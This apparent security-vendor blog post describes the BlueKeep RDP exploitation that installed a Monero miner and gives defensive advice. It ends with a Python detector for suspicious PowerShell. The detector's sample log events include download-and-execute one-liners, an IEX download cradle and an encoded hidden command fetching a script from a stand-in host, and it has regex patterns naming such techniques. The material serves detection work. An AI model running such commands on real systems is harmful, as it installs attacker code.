Threat Watch

“BlueKeep” Windows RDP Vulnerability Exploited Last Weekend

Microsoft issued a security patch for Windows systems in May of 2019 to close a serious vulnerability in the Remote Desktop Protocol (RDP) service that could allow an attacker to run programs and gain control of vulnerable Windows computers remotely. Despite dire warnings from Microsoft and U.S. Government officials to apply the security patch as soon as possible, millions of Windows systems connected to the Internet have remained unpatched and vulnerable to exploitation, leading security researchers to predict that a malware worm will likely take advantage of these vulnerable systems and mass-scan the Internet for more vulnerable systems, possibly leading to network congestion and worldwide slowing of data flow.

On Saturday, November 2nd, security researchers running “honeypot” systems observed that most of their honeypots with RDP port 3389 exposed to the Internet reported a crash, which appeared to be related to exploitation activity. Closer examination by Marcus Hutchins, a security researcher from Kryptos Logic, confirmed that an attacker had used pieces of a publicly-available BlueKeep exploit from the penetration-testing tool Metasploit in an attempt to run a series of PowerShell scripts that result in downloading and running a malware program designed to mine Monero cryptocurrency. The Monero mining malware misuses computer resources and electricity to generate money for the attacker while slowing down the victim’s computer, but it would not allow the attacker to steal or destroy files. However, the same exploit could have been used to install any other type of malware, including Remote Access Trojans (RATs) or ransomware.

Although the first reported mass exploitation of the BlueKeep vulnerability was not as damaging as it could have been, it still serves as a serious warning to any company or organization that has not yet applied Microsoft’s patch from May. In addition to the danger posed by allowing unpatched computers to be connected to the Internet, it is also dangerous to allow unfettered access to Remote Desktop Protocol (RDP port 3389); attackers launch password-guessing attacks against exposed RDP constantly, resulting in many breaches with serious consequences. The best practice for allowing employees remote access is to use a Virtual Private Network (VPN) with client certificates and two-factor authentication (2FA) required to log in. RDP access can be granted only after first connecting to the VPN. A good defense-in-depth strategy should also be capable of detecting and reporting unusual PowerShell scripts running on any computer system in a corporate network. The Binary Defense Security Operations Center (SOC) analysts monitor for PowerShell scripts and inspect unusual scripts to uncover signs of attacker behavior on protected endpoints.
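To illustrate the kind of PowerShell monitoring described above, here is an added example (not Binary Defense’s own tooling) that scores PowerShell Script Block Logging records (Event ID 4104) for the traits seen in download-and-execute chains: download cradles, Invoke-Expression, encoded commands, hidden windows and profile suppression. The log format, host names, URL and threshold are all constructed for this example.

```python
import base64
import re

# Indicator families; an event is flagged when at least `threshold` distinct families match.
INDICATORS = {
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|Start-BitsTransfer", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "encoded_command": re.compile(r"-[Ee]nc(?:odedCommand)?\b"),
    "hidden_window": re.compile(r"-w(?:indowStyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop\b|-NoProfile\b", re.I),
}
EVENT_RE = re.compile(r"^EventID=(\d+)\s+Computer=(\S+)\s+ScriptBlockText=(.*)$", re.S)


def _ps_encode(command: str) -> str:
    """PowerShell -EncodedCommand expects base64 of the UTF-16LE script text."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed sample 4104 records (simplified format), not real telemetry.
SAMPLE_EVENTS = [
    "EventID=4104 Computer=WS01 ScriptBlockText=Get-ChildItem C:\\Reports | Sort-Object LastWriteTime",
    "EventID=4104 Computer=WS02 ScriptBlockText=IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/m.ps1')",
    "EventID=4104 Computer=WS03 ScriptBlockText=powershell -nop -w hidden -EncodedCommand "
    + _ps_encode("Invoke-WebRequest http://example.invalid/u.ps1 -OutFile $env:TEMP\\u.ps1; & $env:TEMP\\u.ps1"),
]


def decode_encoded_command(text: str) -> str:
    """Return the decoded -EncodedCommand payload, or '' if absent or malformed."""
    m = re.search(r"-[Ee]nc(?:odedCommand)?\s+([A-Za-z0-9+/=]+)", text)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_script_block(text: str):
    """Match indicator families against the script text and its decoded payload."""
    decoded = decode_encoded_command(text)
    combined = text + "\n" + decoded
    hits = [name for name, rx in INDICATORS.items() if rx.search(combined)]
    return hits, decoded


def find_suspicious(events, threshold: int = 2):
    """Return one finding per event whose indicator count reaches the threshold."""
    findings = []
    for line in events:
        m = EVENT_RE.match(line)
        if not m or m.group(1) != "4104":
            continue
        hits, decoded = score_script_block(m.group(3))
        if len(hits) >= threshold:
            findings.append({"host": m.group(2), "indicators": hits, "decoded": decoded})
    return findings
```

The threshold keeps single-indicator benign activity (an admin running Invoke-WebRequest interactively) from paging an analyst, while the decoded payload is surfaced so the reviewer sees what an encoded command actually does.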
